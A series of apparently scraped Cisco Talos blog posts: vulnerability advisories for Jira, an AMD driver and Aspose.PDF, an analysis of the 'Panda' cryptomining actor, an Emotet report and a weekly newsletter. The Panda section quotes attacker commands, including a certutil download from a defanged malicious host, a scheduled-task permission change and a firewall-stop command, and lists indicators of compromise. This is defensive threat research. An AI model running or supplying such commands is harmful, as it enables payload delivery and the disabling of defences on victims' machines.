An exploitable CSRF vulnerability exists in Atlassian Jira 7.6.4. An attacker controlling a subdomain different that the Jira hosting subdomain enables cookie injection and control of the CSRF header token. An attacker can create a cookie and submit CSRF attacks on behalf of a logged-in user to trigger this vulnerability.

Read the complete vulnerability advisory here for additional information.

Atlassian Jira Issue key information disclosure vulnerability (TALOS-2019-0836/CVE-2019-14995

An issue key information disclosure vulnerability exists in Atlassian Jira, from versions 7.6.4 to 8.1.0. Anonymous users can differentiate between valid issue keys and invalid issue keys via the `/rest/api/1.0/render` API endpoint.

Read the complete vulnerability advisory here for additional information.

Atlassian Jira issue attachment name information disclosure vulnerability (TALOS-2019-0837/CVE-2019-14995)

An issue attachment name information disclosure vulnerability exists in Atlassian Jira, from versions 7.6.4 to 8.1.0. Anonymous users can differentiate between valid attachment names and invalid attachment names for any given issue via `/rest/api/1.0/render` API endpoint.

Read the complete vulnerability advisory here for additional information.

Atlassian Jira Tempo plugin issue summary information disclosure vulnerability (TALOS-2019-0838/CVE-2019-5095)

An issue summary information disclosure vulnerability exists in Atlassian Jira Tempo plugin, version 4.10.0. Authenticated users can obtain the summary for issues they do not have permission to view via the Tempo plugin.

Read the complete vulnerability advisory here for additional information.

Atlassian Jira issueTable username information disclosure vulnerability (TALOS-2019-0839/CVE-2019-XXXX)

A username information disclosure vulnerability exists in Atlassian Jira, from versions 7.6.4 to 8.1.0. Anonymous users can differentiate between valid usernames and invalid usernames via `/rest/issueNav/1/issueTable` API endpoint.

Read the complete vulnerability advisory here for additional information.

Atlassian Jira worklog information disclosure vulnerability (TALOS-2019-0840/CVE-2019-XXXX)

A worklog information disclosure vulnerability exists in Atlassian Jira, versions 7.6.4 to 8.1.0. Authenticated users can view worklog details for issues they do not have permission to view via the `/rest/api/2/worklog/list` API endpoint. They can also obtain a list of worklog ID's via `/rest/api/2/worklog/updated`.

Read the complete vulnerability advisory here for additional information.

Versions tested

Talos tested and confirmed that versions 7.6.4 through 8.1.0 of Atlassian Jira are affected by these vulnerabilities.

Coverage

The following SNORTⓇ rules will detect exploitation attempts. Note that additional rules may be released at a future date and current rules are subject to change pending additional vulnerability information. For the most current rule information, please refer to your Firepower Management Center or Snort.org.

Snort Rules: 50110, 50111, 50114

Vulnerability Spotlight: AMD ATI Radeon ATIDXX64.DLL shader functionality remote code execution vulnerability

$
0
0

Piotr Bania of Cisco Talos discovered this vulnerability.

Some AMD Radeon cards contain a remote code execution vulnerability in their ATIDXX64.DLL driver. AMD produces the Radeon line of hardware, which includes graphics cards and graphics processing units. This specific vulnerability exists on the Radeon RX 550 and the 550 Series while running VMWare Workstation 15. An attacker could exploit this vulnerability by supplying a malformed pixel shared inside the VMware guest operating system to the driver. This could corrupt memory in a way that would allow the attacker to gain the ability to remotely execute code on the victim machine.

In accordance with our coordinated disclosure policy, Cisco Talos worked with AMD to ensure that these issues are resolved and that an update is available for affected customers.

Vulnerability details

AMD ATI Radeon ATIDXX64.DLL shader functionality remote code execution vulnerability (TALOS-2019-0818/CVE-2019-5049)

An exploitable memory corruption vulnerability exists in AMD ATIDXX64.DLL driver, versions 25.20.15031.5004 and 25.20.15031.9002. A specially crafted pixel shader can cause an out-of-bounds memory write. An attacker can provide a specially crafted shader file to trigger this vulnerability. This vulnerability can be triggered from within a VMware guest, potentially allowing code execution on the associated VMware host.

Read the complete vulnerability advisory here for additional information.

Versions tested

Talos tested and confirmed that this vulnerability affects AMD ATIDXX64.DLL, versions 25.20.15031.5004 and 25.20.15031.9002, while running on the Radeon RX 550/550 Series. This vulnerability can only be exploited when VMware Workstation 15 version, 15.0.4,build-12990004 with Windows 10 x64 as the guestVM is running.


Coverage

The following SNORTⓇ rules will detect exploitation attempts. Note that additional rules may be released at a future date and current rules are subject to change pending additional vulnerability information. For the most current rule information, please refer to your Firepower Management Center or Snort.org.

Snort Rules: 49978, 49979

New Cisco Talos web reputation verdicts

$
0
0
Cisco Talos has updated and expanded the Talos Threat Levels used to describe our web reputation verdicts. 

As you will see in the chart below, we are increasing the amount of reputation verdicts from three to five, as well as retaining the Unknown category across the board. 

Cisco Security products may display these new scores over time, beginning with the upcoming Cisco NGFW release of 6.5. This allows for more granular scoring of web reputation verdicts, and gives customers greater control over the defense of their networks.


At this time, we are not adjusting the Talos Email Reputation scores, and we have no timeframe for doing so.

Here’s a rundown of our new Threat Levels verbiage:


This chart may also be found on our website.

There will be no impact to the efficacy to Talos Web Reputation. For a short period, TalosIntelligence.com will show both the new and the old threat level verdicts.

The ability to dispute the reputation of a domain or URL remains the same, and is available to both customers and non-customers alike by visiting our reputation support portal. After logging in, you may fill out the form (up to 50 entries at a time) with URLs, domains, or IPs and propose a reputation verdict that you think the entry should have.




After you submit a ticket, you can view its real-time status on your “My Tickets” page.

We hope everyone finds these changes useful. As always, Talos’ goal is to keep your network and systems safe.

Vulnerability Spotlight: Multiple vulnerabilities in Aspose PDF API

$
0
0

Marcin Noga of Cisco Talos discovered these vulnerabilities.

Cisco Talos recently discovered multiple remote code execution vulnerabilities in the Aspose.PDF API. Aspose provides a series of APIs for manipulating or converting a large family of document formats. These vulnerabilities exist in APIs that help process PDFs. An attacker could exploit these vulnerabilities by sending a specially crafted, malicious file to the target and trick them into opening it while using the corresponding API.

In accordance with our coordinated disclosure policy, Cisco Talos worked with Aspose to ensure that these issues are resolved and that an update is available for affected customers.

Vulnerability details

Aspose.PDF FunctionType 0 remote code execution vulnerability (TALOS-2019-0809/CVE-2019-5042)

An exploitable use-after-free vulnerability exists in the way FunctionType 0 PDF elements are processed in Aspose.PDF. A specially crafted PDF can cause a dangling heap pointer, resulting in a use-after-free. An attacker can send a malicious PDF to trigger this vulnerability. 

Read the complete vulnerability advisory here for additional information. 

Aspose.PDF for C++  LZWDecode filter predictor remote code execution vulnerability (TALOS-2019-0855/CVE-2019-5066)

An exploitable use-after-free vulnerability exists in the way LZW compressed streams are processed in Aspose.PDF 19.2. A specially crafted PDF can cause a dangling heap pointer, resulting in a use-after-free. To trigger this vulnerability, a specifically crafted PDF document needs to be processed by the target application.

Read the complete vulnerability advisory here for additional information.

Aspose.PDF for C++  parent generation remote code execution vulnerability (TALOS-2019-0856/CVE-2019-5067)

An uninitialized memory access vulnerability exists in the way Aspose.PDF for C++ 19.2 handles invalid parent object pointers. A specially crafted PDF can cause a read and write from uninitialized memory, resulting in memory corruption and possibly arbitrary code execution. To trigger this vulnerability, a specifically crafted PDF document needs to be processed by the target application.

Read the complete vulnerability advisory here for additional information. 

Versions tested

Talos tested and confirmed that these vulnerabilities affect Aspose.PDF, version 19.2.

Coverage

The following SNORTⓇ rules will detect exploitation attempts. Note that additional rules may be released at a future date and current rules are subject to change pending additional vulnerability information. For the most current rule information, please refer to your Firepower Management Center or Snort.org.

Snort Rules: 50730, 50731, 50738, 50739


Cryptocurrency miners aren’t dead yet: Documenting the voracious but simple “Panda”

$
0
0
By Christopher Evans and David Liebenberg.


Executive summary

A new threat actor named "Panda" has generated thousands of dollars worth of the Monero cryptocurrency through the use of remote access tools (RATs) and illicit cryptocurrency-mining malware. This is far from the most sophisticated actor we've ever seen, but it still has been one of the most active attackers we've seen in Cisco Talos threat trap data. Panda's willingness to persistently exploit vulnerable web applications worldwide, their tools allowing them to traverse throughout networks, and their use of RATs, means that organizations worldwide are at risk of having their system resources misused for mining purposes or worse, such as exfiltration of valuable information.

Panda has shown time and again they will update their infrastructure and exploits on the fly as security researchers publicize indicators of compromises and proof of concepts. Our threat traps show that Panda uses exploits previously used by Shadow Brokers — a group infamous for publishing information from the National Security Agency — and Mimikatz, an open-source credential-dumping program.

Talos first became aware of Panda in the summer of 2018, when they were engaging in the successful and widespread "MassMiner" campaign. Shortly thereafter, we linked Panda to another widespread illicit mining campaign with a different set of command and control (C2) servers. Since then, this actor has updated its infrastructure, exploits and payloads. We believe Panda is a legitimate threat capable of spreading cryptocurrency miners that can use up valuable computing resources and slow down networks and systems. Talos confirmed that organizations in the banking, healthcare, transportation, telecommunications, IT services industries were affected in these campaigns.


First sightings of the not-so-elusive Panda

We first observed this actor in July of 2018 exploiting a WebLogic vulnerability (CVE-2017-10271) to drop a miner that was associated with a campaign called "MassMiner" through the wallet, infrastructure, and post-exploit PowerShell commands used.

Panda used massscan to look for a variety of different vulnerable servers and then exploited several different vulnerabilities, including the aforementioned Oracle bug and a remote code execution vulnerability in Apache Struts 2 (CVE-2017-5638). They used PowerShell post-exploit to download a miner payload called "downloader.exe," saving it in the TEMP folder under a simple number filename such as "13.exe" and executing it. The sample attempts to download a config file from list[.]idc3389[.]top over port 57890, as well as kingminer[.]club. The config file specifies the Monero wallet to be used as well as the mining pool. In all, we estimate that Panda has amassed an amount of Monero that is currently valued at roughly $100,000.

By October 2018, the config file on list[.]idc3389[.]top, which was then an instance of an HttpFileServer (HFS), had been downloaded more than 300,000 times.
The sample also installs Gh0st RAT, which communicates with the domain rat[.]kingminer[.]club. In several samples, we also observed Panda dropping other hacking tools and exploits. This includes the credential-theft tool Mimikatz and UPX-packed artifacts related to the Equation Group set of exploits. The samples also appear to scan for open SMB ports by reaching out over port 445 to IP addresses in the 172.105.X.X block.

One of Panda's C2 domains, idc3389[.]top, was registered to a Chinese-speaking actor, who went by the name "Panda."

Bulehero connection

Around the same time that we first observed these initial Panda attacks, we observed very similar TTPs in an attack using another C2 domain: bulehero[.]in. The actors used PowerShell to download a file called "download.exe" from b[.]bulehero[.]in, and similarly, save it as another simple number filename such as "13.exe" and execute it. The file server turned out to be an instance of HFS hosting four malicious files.

Running the sample in our sandboxes, we observed several elements that connect it to the earlier MassMiner campaign. First, it issues a GET request for a file called cfg.ini hosted on a different subdomain of bulehero[.]in, c[.]bulehero[.]in, over the previously observed port 57890. Consistent with MassMiner, the config file specifies the site from which the original sample came, as well as the wallet and mining pool to be used for mining.

Additionally, the sample attempts to shut down the victim's firewall with commands such as "cmd /c net stop MpsSvc". The malware also modifies the access control list to grant full access to certain files through running cacsl.exe.

For example:
cmd /c schtasks /create /sc minute /mo 1 /tn "Netframework" /ru system /tr "cmd /c echo Y|cacls C:\Windows\appveif.exe /p everyone:F
Both of these behaviors have also been observed in previous MassMiner infections.

The malware also issues a GET request to Chinese-language IP geolocation service ip138[.]com for a resource named ic.asp which provides the machine's IP address and location in Chinese. This behavior was also observed in the MassMiner campaign.

Additionally, appveif.exe creates a number of files in the system directory. Many of these files were determined to be malicious by multiple AV engines and appear to match the exploits of vulnerabilities targeted in the MassMiner campaign. For instance, several artifacts were detected as being related to the "Shadow Brokers" exploits and were installed in a suspiciously named directory: "\Windows\InfusedAppe\Eternalblue139\specials\".

Evolution of Panda

In January of 2019, Talos analysts observed Panda exploiting a recently disclosed vulnerability in the ThinkPHP web framework (CNVD-2018-24942) in order to spread similar malware. ThinkPHP is an open-source web framework popular in China.

Panda used this vulnerability to both directly download a file called "download.exe" from a46[.]bulehero[.]in and upload a simple PHP web shell to the path "/public/hydra.php", which is subsequently used to invoke PowerShell to download the same executable file. The web shell provides only the ability to invoke arbitrary system commands through URL parameters in an HTTP request to "/public/hydra.php". Download.exe would download the illicit miner payload and also engages in SMB scanning, evidence of Panda's attempt to move laterally within compromised organizations.

In March 2019, we observed the actor leveraging new infrastructure, including various subdomains of the domain hognoob[.]se. At the time, the domain hosting the initial payload, fid[.]hognoob[.]se, resolved to the IP address 195[.]128[.]126[.]241, which was also associated with several subdomains of bulehero[.]in.

At the time, the actor's tactics, techniques, and procedures (TTPs) remained similar to those used before. Post-exploit, Panda invokes PowerShell to download an executable called "download.exe" from the URL hxxp://fid[.]hognoob[.]se/download.exe and save it in the Temp folder, although Panda now saved it under a high-entropy filename i.e. 'C:/Windows/temp/autzipmfvidixxr7407.exe'. This file then downloads a Monero mining trojan named "wercplshost.exe" from fid[.]hognoob[.]se as well as a configuration file called "cfg.ini" from uio[.]hognoob[.]se, which provides configuration details for the miner.

"Wercplshost.exe" contains exploit modules designed for lateral movement, many of which are related to the "Shadow Brokers" exploits, and engages in SMB brute-forcing. The sample acquires the victim's internal IP and reaches out to Chinese-language IP geolocation site 2019[.]ip138[.]com to get the external IP, using the victim's Class B address as a basis for port scanning. It also uses the open-source tool Mimikatz to collect victim passwords.

Soon thereafter, Panda began leveraging an updated payload. Some of the new features of the payload include using Certutil to download the secondary miner payload through the command: "certutil.exe -urlcache -split -f http://fid[.]hognoob[.]se/upnpprhost.exe C:\Windows\Temp\upnpprhost.exe". The coinminer is also run using the command "cmd /c ping 127.0.0.1 -n 5 & Start C:\Windows\ugrpkute\[filename].exe".

The updated payload still includes exploit modules designed for lateral movement, many of which are related to the "Shadow Brokers" exploits. One departure, however, is previously observed samples acquire the victim's internal IP and reach out to Chinese-language IP geolocation site 2019[.]ip138[.]com to get the external IP, using the victim's Class B address as a basis for port scanning. This sample installs WinPcap and open-source tool Masscan and scans for open ports on public IP addresses saving the results to "Scant.txt" (note the typo). The sample also writes a list of hardcoded IP ranges to "ip.txt" and passes it to Masscan to scan for port 445 and saves the results to "results.txt." This is potentially intended to find machines vulnerable to MS17-010, given the actor's history of using EternalBlue. The payload also leverages previously-used tools, launching Mimikatz to collect victim passwords

In June, Panda began targeting a newer WebLogic vulnerability, CVE-2019-2725, but their TTPs remained the same.

Recent activity

Panda began employing new C2 and payload-hosting infrastructure over the past month. We observed several attacker IPs post-exploit pulling down payloads from the URL hxxp[:]//wiu[.]fxxxxxxk[.]me/download.exe and saving it under a random 20-character name, with the first 15 characters consisting of "a" - "z" characters and the last five consisting of digits (e.g., "xblzcdsafdmqslz19595.exe"). Panda then executes the file via PowerShell. Wiu[.]fxxxxxxk[.]me resolves to the IP 3[.]123[.]17[.]223, which is associated with older Panda C2s including a46[.]bulehero[.]in and fid[.]hognoob[.]se.

Besides the new infrastructure, the payload is relatively similar to the one they began using in May 2019, including using Certutil to download the secondary miner payload located at hxxp[:]//wiu[.]fxxxxxxk[.]me/sppuihost.exe and using ping to delay execution of this payload. The sample also includes Panda's usual lateral movement modules that include Shadow Brokers' exploits and Mimikatz.

One difference is that several samples contained a Gh0st RAT default mutex "DOWNLOAD_SHELL_MUTEX_NAME" with the mutex name listed as fxxk[.]noilwut0vv[.]club:9898. The sample also made a DNS request for this domain. The domain resolved to the IP 46[.]173[.]217[.]80, which is also associated with several subdomains of fxxxxxxk[.]me and older Panda C2 hognoob[.]se. Combining mining capabilities and Gh0st RAT represents a return to Panda's earlier behavior.

On August 19, 2019, we observed that Panda has added another set of domains to his inventory of C2 and payload-hosting infrastructure. In line with his previous campaigns, we observed multiple attacker IPs pulling down payloads from the URL hxxp[:]//cb[.]f*ckingmy[.]life/download.exe. In a slight departure from previous behavior, the file was saved as "BBBBB,", instead of as a random 20-character name. cb[.]f*ckingmy[.]life (URL censored due to inappropriate language) currently resolves to the IP 217[.]69[.]6[.]42, and was first observed by Cisco Umbrella on August 18.

In line with previous samples Talos has analyzed over the summer, the initial payload uses Certutil to download the secondary miner payload located at http[:]//cb[.]fuckingmy[.]life:80/trapceapet.exe. This sample also includes a Gh0st RAT mutex, set to "oo[.]mygoodluck[.]best:51888:WervPoxySvc", and made a DNS request for this domain. The domain resolved to 46[.]173[.]217[.]80, which hosts a number of subdomains of fxxxxxxk[.]me and hognoob[.]se, both of which are known domains used by Panda. The sample also contacted li[.]bulehero2019[.]club.

Cisco Threat Grid's analysis also showed artifacts associated with Panda's typical lateral movement tools that include Shadow Brokers exploits and Mimikatz. The INI file used for miner configuration lists the mining pool as mi[.]oops[.]best, with a backup pool at mx[.]oops[.]best.


Conclusion

Panda's operational security remains poor, with many of their old and current domains all hosted on the same IP and their TTPs remaining relatively similar throughout campaigns. The payloads themselves are also not very sophisticated.

However, system administrators and researchers should never underestimate the damage an actor can do with widely available tools such as Mimikatz. Some information from HFS used by Panda shows that this malware had a wide reach and rough calculations on the amount of Monero generated show they made around 1,215 XMR in profits through their malicious activities, which today equals around $100,000, though the amount of realized profits is dependent on the time they sold.

Panda remains one of the most consistent actors engaging in illicit mining attacks and frequently shifts the infrastructure used in their attacks. They also frequently update their targeting, using a variety of exploits to target multiple vulnerabilities, and is quick to start exploiting known vulnerabilities shortly after public POCs become available, becoming a menace to anyone slow to patch. And, if a cryptocurrency miner is able to infect your system, that means another actor could use the same infection vector to deliver other malware. Panda remains an active threat and Talos will continue to monitor their activity in order to thwart their operations.


COVERAGE

For coverage related to blocking illicit cryptocurrency mining, please see the Cisco Talos white paper: Blocking Cryptocurrency Mining Using Cisco Security Products

Advanced Malware Protection (AMP) is ideally suited to prevent the execution of the malware used by these threat actors.

Cisco Cloud Web Security (CWS) or Web Security Appliance (WSA) web scanning prevents access to malicious websites and detects malware used in these attacks.

Network Security appliances such as Next-Generation Firewall (NGFW), Next-Generation Intrusion Prevention System (NGIPS), and Meraki MX can detect malicious activity associated with this threat.

AMP Threat Grid helps identify malicious binaries and build protection into all Cisco Security products.

Umbrella, our secure internet gateway (SIG), blocks users from connecting to malicious domains, IPs, and URLs, whether users are on or off the corporate network.

Open Source SNORTⓇ Subscriber Rule Set customers can stay up to date by downloading the latest rule pack available for purchase on Snort.org.

IOCs

Domains

a45[.]bulehero[.]in
a46[.]bulehero[.]in
a47[.]bulehero[.]in
a48[.]bulehero[.]in
a88[.]bulehero[.]in
a88[.]heroherohero[.]info
a[.]bulehero[.]in
aic[.]fxxxxxxk[.]me
axx[.]bulehero[.]in
b[.]bulehero[.]in
bulehero[.]in
c[.]bulehero[.]in
cb[.]fuckingmy[.].life
cnm[.]idc3389[.]top
down[.]idc3389[.]top
fid[.]hognoob[.]se
fxxk[.]noilwut0vv[.]club
haq[.]hognoob[.]se
idc3389[.]top
idc3389[.]cc
idc3389[.]pw
li[.]bulehero2019[.]club
list[.]idc3389[.]top
mi[.]oops[.]best
mx[.]oops[.]best
nrs[.]hognoob[.]se
oo[.]mygoodluck[.]best
pool[.]bulehero[.]in
pxi[.]hognoob[.]se
pxx[.]hognoob[.]se
q1a[.]hognoob[.]se
qie[.]fxxxxxxk[.]me
rp[.]oiwcvbnc2e[.]stream
uio[.]heroherohero[.]info
uio[.]hognoob[.]se
upa1[.]hognoob[.]se
upa2[.]hognoob[.]se
wiu[.]fxxxxxxk[.]me
yxw[.]hognoob[.]se
zik[.]fxxxxxxk[.]me

IPs

184[.]168[.]221[.]47
172[.]104[.]87[.]6
139[.]162[.]123[.]87
139[.]162[.]110[.]201
116[.]193[.]154[.]122
95[.]128[.]126[.]241
195[.]128[.]127[.]254
195[.]128[.]126[.]120
195[.]128[.]126[.]243
195[.]128[.]124[.]140
139[.]162[.]71[.]92
3[.]123[.]17[.]223
46[.]173[.]217[.]80
5[.]56[.]133[.]246

SHA-256

2df8cfa5ea4d63615c526613671bbd02cfa9ddf180a79b4e542a2714ab02a3c1
fa4889533cb03fc4ade5b9891d4468bac9010c04456ec6dd8c4aba44c8af9220
2f4d46d02757bcf4f65de700487b667f8846c38ddb50fbc5b2ac47cfa9e29beb
829729471dfd7e6028af430b568cc6e812f09bb47c93f382a123ccf3698c8c08
8b645c854a3bd3c3a222acc776301b380e60b5d0d6428db94d53fad6a98fc4ec
1e4f93a22ccbf35e2f7c4981a6e8eff7c905bc7dbb5fedadd9ed80768e00ab27
0697127fb6fa77e80b44c53d2a551862709951969f594df311f10dcf2619c9d5
f9a972757cd0d8a837eb30f6a28bc9b5e2a6674825b18359648c50bbb7d6d74a
34186e115f36584175058dac3d34fe0442d435d6e5f8c5e76f0a3df15c9cd5fb
29b6dc1a00fea36bc3705344abea47ac633bc6dbff0c638b120d72bc6b38a36f
3ed90f9fbc9751a31bf5ab817928d6077ba82113a03232682d864fb6d7c69976
a415518642ce4ad11ff645151195ca6e7b364da95a8f89326d68c836f4e2cae1
4d1f49fac538692902cc627ab7d9af07680af68dd6ed87ab16710d858cc4269c
8dea116dd237294c8c1f96c3d44007c3cd45a5787a2ef59e839c740bf5459f21
991a9a8da992731759a19e470c36654930f0e3d36337e98885e56bd252be927e
a3f1c90ce5c76498621250122186a0312e4f36e3bfcfede882c83d06dd286da1
9c37a6b2f4cfbf654c0a5b4a4e78b5bbb3ba26ffbfab393f0d43dad9000cb2d3
d5c1848ba6fdc6f260439498e91613a5db8acbef10d203a18f6b9740d2cab3ca
29b6dc1a00fea36bc3705344abea47ac633bc6dbff0c638b120d72bc6b38a36f
6d5479adcfa4c31ad565ab40d2ea8651bed6bd68073c77636d1fe86d55d90c8d

Monero Wallets

49Rocc2niuCTyVMakjq7zU7njgZq3deBwba3pTcGFjLnB2Gvxt8z6PsfEn4sc8WPPedTkGjQVHk2RLk7btk6Js8gKv9iLCi 1198.851653275126
4AN9zC5PGgQWtg1mTNZDySHSS79nG1qd4FWA1rVjEGZV84R8BqoLN9wU1UCnmvu1rj89bjY4Fat1XgEiKks6FoeiRi1EHhh
44qLwCLcifP4KZfkqwNJj4fTbQ8rkLCxJc3TW4UBwciZ95yWFuQD6mD4QeDusREBXMhHX9DzT5LBaWdVbsjStfjR9PXaV9L


Emotet is back after a summer break

$
0
0
This blog post was written by Colin Grady, William Largent, and Jaeson Schultz.


Emotet is still evolving, five years after its debut as a banking trojan. It is one of the world's most dangerous botnets and malware droppers-for-hire. The malware payloads dropped by Emotet serve to more fully monetize their attacks, and often include additional banking trojans, information stealers, email harvesters, self-propagation mechanisms and even ransomware.

At the beginning of June 2019, Emotet's operators decided to take an extended summer vacation. Even the command and control (C2) activities saw a major pause in activity. However, as summer begins drawing to a close, Talos and other researchers started to see increased activity in Emotet's C2 infrastructure. And as of Sept. 16, 2019, the Emotet botnet has fully reawakened, and has resumed spamming operations once again. While this reemergence may have many users scared, Talos' traditional Emotet coverage and protection remains the same. We have a slew of new IOCs to help protect users from this latest push, but past Snort coverage will still block this malware, as well traditional best security practices such as avoiding opening suspicious email attachments and using strong passwords.

Emotet's email propagation

One of Emotet's most devious methods of self-propagation centers around its use of socially engineered spam emails. Emotet's reuse of stolen email content is extremely effective. Once they have swiped a victim's email, Emotet constructs new attack messages in reply to some of that victim's unread email messages, quoting the bodies of real messages in the threads.


The email above illustrates Emotet's social engineering. In this example, we have a malicious email from Emotet, and contained inside the body of the email we can see a previous conversation between two aides to the mayor of a U.S. city.
  1. Initially, Lisa sent an email to Erin about placing advertisements to promote an upcoming ceremony where the mayor would be in attendance.
  2. Erin replied to Lisa inquiring about some of the specifics of the request.
  3. Lisa became infected with Emotet. Emotet then stole the contents of Lisa's email inbox, including this message from Erin.
  4. Emotet composed an attack message in reply to Erin, posing as Lisa. An infected Word document is attached at the bottom.
It's easy to see how someone expecting an email as part of an ongoing conversation could fall for something like this, and it is part of the reason that Emotet has been so effective at spreading itself via email. By taking over existing email conversations, and including real Subject headers and email contents, the messages become that much more randomized, and more difficult for anti-spam systems to filter.

Emotet's email sending infrastructure

This message wasn't sent using Lisa's own Emotet-infected computer through her configured outbound mail server. Instead, this email was transmitted from an Emotet infection in a completely different location, utilizing a completely unrelated outbound SMTP server.

It turns out that in addition to stealing the contents of victims' inboxes, Emotet also swipes victims' credentials for sending outbound email. Emotet then distributes these stolen email credentials to other bots in its network, who then utilize these stolen credentials to transmit Emotet attack messages.

In the process of analyzing Emotet, Cisco Talos has detonated hundreds of thousands of copies of the Emotet malware inside of our malware sandbox, Threat Grid. Over the past 10 months, Emotet has attempted to use Threat Grid infections as outbound spam emitters nearly 19,000 times.

When Emotet's C2 designates one of its infections as a spam emitter, the bot will receive a list of outbound email credentials containing usernames, passwords and mail server IP addresses. Over the past 10 months, Cisco Talos collected 349,636 unique username/password/IP combos. Of course, many larger networks deploy multiple mail server IP addresses, and in the data we saw a fair amount of repeat usernames and passwords using different, but related mail server IPs. Eliminating the server IP data, and looking strictly at usernames and passwords, Talos found 202,675 unique username-password combinations.

Since Talos was observing infections over a monthslong timeframe, we were able to make an assessment regarding the average lifespan of the credentials we saw Emotet distributing. In all, the average lifespan of a single set of stolen outbound email credentials was 6.91 days. However, when we looked more closely at the distribution, 75 percent of the credentials stolen and used by Emotet lasted under one day. Ninety-two percent of the credentials stolen by Emotet disappeared within one week. The remaining 8 percent of Emotet's outbound email infrastructure had a much longer lifespan.

In fact, we found some outbound credentials that were utilized by Emotet for the entire duration of our sample data. Below is a graph illustrating the volume of credentials having a longer lifespan with days along the X-axis vs. the number of stolen SMTP credentials along the Y-axis. There are quite a few stolen outbound email credentials that Emotet has been using over a period of many months. Talos is reaching out to the affected networks in an attempt to remediate some of the current worst offenders.

Emotet's recipients

As opposed to simply drafting new attack messages, stealing old email messages and jumping into the middle of an existing email conversation is a fairly expensive thing to do. Looking at all the email Emotet attempted to send during the month of April 2019, we found Emotet included stolen email conversations only approximately 8.5 percent of the time. Since Emotet has reemerged, however, we have seen an increase in this tactic with stolen email threads appearing in almost one quarter of Emotet's outbound emails.

Emotet also apparently has a considerable database of potential recipients to draw from. Looking at all of the intended recipients of Emotet's attack messages in April 2019, we found that 97.5 percent of Emotet's recipients received only a single message. There was however, one victim, who managed to receive ten Emotet attack messages during that same period. Either Emotet has something against that guy in particular, or more likely, it is simply an artifact about the method Emotet uses to distribute victim email addresses to its outbound spam emitters.

A word about passwords


Emotet's stolen outbound email credentials contained over 176,000 unique passwords, so we decided to have a look at the passwords by themselves, without regard to the username or mail server IP. Below is a list of the most common passwords, and on the left hand side is the number of unique outbound SMTP credentials found utilizing that particular password.


It comes as no surprise that perennially problematic passwords such as "123456" and "password" (along with numerous variations of those) appear with a significant degree of prominence. However, there are other passwords in the set that are much more unique in terms of "Why would so many different accounts use that same strange password?" Most likely these are victims of Emotet who themselves controlled a large number of distinct email boxes while also committing the cybersecurity cardinal sin of reusing the same password across many different accounts.



Conclusion

Emotet has been around for years, this reemergence comes as no surprise. The good news is, the same advice for staying protected from Emotet remains. To avoid Emotet taking advantage of your email account, be sure to use strong passwords and opt in to multi-factor authentication, if your email provider offers that as an option. Be wary of emails that seem to be unexpected replies to old threads, emails that seem suspiciously out of context, or those messages that come from familiar names but unfamiliar email addresses. As always, you can rely on Snort rules to keep your system and network protected, as well. Previous Snort rules Talos has released will still protect from this wave of Emotet, and there is always the opportunity for new coverage in the future.

This is also a good opportunity to recognize that security researchers and practitioners can never take their foot off the gas. When a threat group goes silent, it's unlikely they'll be gone forever. Rather, this opens up the opportunity for a threat group to return with new IOCs, tactics, techniques and procedures or new malware variants that can avoid existing detection. Just as we saw earlier this year with the alleged breakup of the threat actors behind Gandcrab, it's never safe to assume a threat is gone for good.

IoCs

Indicators of compromise related to Emotet's latest activity can be found here.

Coverage

Additional ways our customers can detect and block this threat are listed below.

Advanced Malware Protection (AMP) is ideally suited to prevent the execution of the malware used by these threat actors.

Cisco Cloud Web Security (CWS) or Web Security Appliance (WSA) web scanning prevents access to malicious websites and detects malware used in these attacks.

Email Security can block malicious emails sent by threat actors as part of their campaign.

Network Security appliances such as Next-Generation Firewall (NGFW), Next-Generation Intrusion Prevention System (NGIPS), andMeraki MX can detect malicious activity associated with this threat.

AMP Threat Grid helps identify malicious binaries and build protection into all Cisco Security products.

Umbrella, our secure internet gateway (SIG), blocks users from connecting to malicious domains, IPs, and URLs, whether users are on or off the corporate network.

Open Source Snort Subscriber Rule Set customers can stay up to date by downloading the latest rule pack available for purchase on Snort.org.

Threat Source newsletter (Sept. 19, 2019)

$
0
0

Newsletter compiled by Jon Munshaw.

Welcome to this week’s Threat Source newsletter — the perfect place to get caught up on all things Talos from the past week.

We’re all still trying to shake off the summer. Gone are the early Fridays, beach vacations and days by the pool. Turns out, attackers may be brushing the same things off. The ever-present Emotet went quiet over the summer, but it’s back now with a slew of new campaigns. While this may sound concerning, the same protections and coverage you’ve always used will keep you safe.

And, speaking of things that won’t stay down, cryptocurrency miners still aren’t going anywhere. We've discovered a new threat actor we’re calling “Panda” that is rapidly spreading miners, even as digital currencies decline in value.

This was also a busy week for vulnerability discovery. We’ve got three new vulnerability spotlights out: the Aspose PDF API, Atlassian’s Jira software and the AMD ATI Radeon line of graphics cards.

We also have our weekly Threat Roundup, which you can find on the blog every Friday afternoon. There, we go over the most prominent threats we’ve seen (and blocked) over the past week.


Upcoming public engagements with Talos

Event: “DNS on Fire” at Virus Bulletin 2019
Location: Novotel London West hotel, London, U.K.
Date: Oct. 2 - 4
Speaker: Warren Mercer and Paul Rascagneres
Synopsis: In this talk, Paul and Warren will walk through two campaigns Talos discovered targeted DNS. The first actor developed a piece of malware, named “DNSpionage,” targeting several government agencies in the Middle East, as well as an airline. During the research process for DNSpionage, we also discovered an effort to redirect DNSs from the targets and discovered some registered SSL certificates for them. The talk will go through the two actors’ tactics, techniques and procedures and the makeup of their targets.

Event: “It’s never DNS...It was DNS: How adversaries are abusing network blind spots” at SecTor
Location: Metro Toronto Convention Center, Toronto, Canada
Date: Oct. 7 - 10
Speaker: Edmund Brumaghin and Earl Carter
Synopsis: While DNS is one of the most commonly used network protocols in most corporate networks, many organizations don’t give it the same level of scrutiny as other network protocols present in their environments. DNS has become increasingly attractive to both red teams and malicious attackers alike to easily subvert otherwise solid security architectures. This presentation will provide several technical breakdowns of real-world attacks that have been seen leveraging DNS for a variety of purposes such as DNSMessenger, DNSpionage, and more.

Cyber Security Week in Review

  • Windows rolled out a new updater tool that is designed to make it easier for users to apply patches. But researchers have already found a string of bugs and flaws. 
  • The LastPass password manager contained a security vulnerability that could have leaked users’ login information to sites they previously visited while utilizing LastPass. The company says it’s released an update to fix this flaw. 
  • An advanced threat group has compromised the networks of at least 11 information technology service providers, likely with the hopes of gaining access to their customers’ systems. At least two of the attacks allowed the malicious actors to gain admin-level access to the victims’ networks. 
  • Facebook plans to assemble a “court” to make the final decision on content restrictions. The social media giant says both the company itself and users will be able to appeal decisions to this board. 
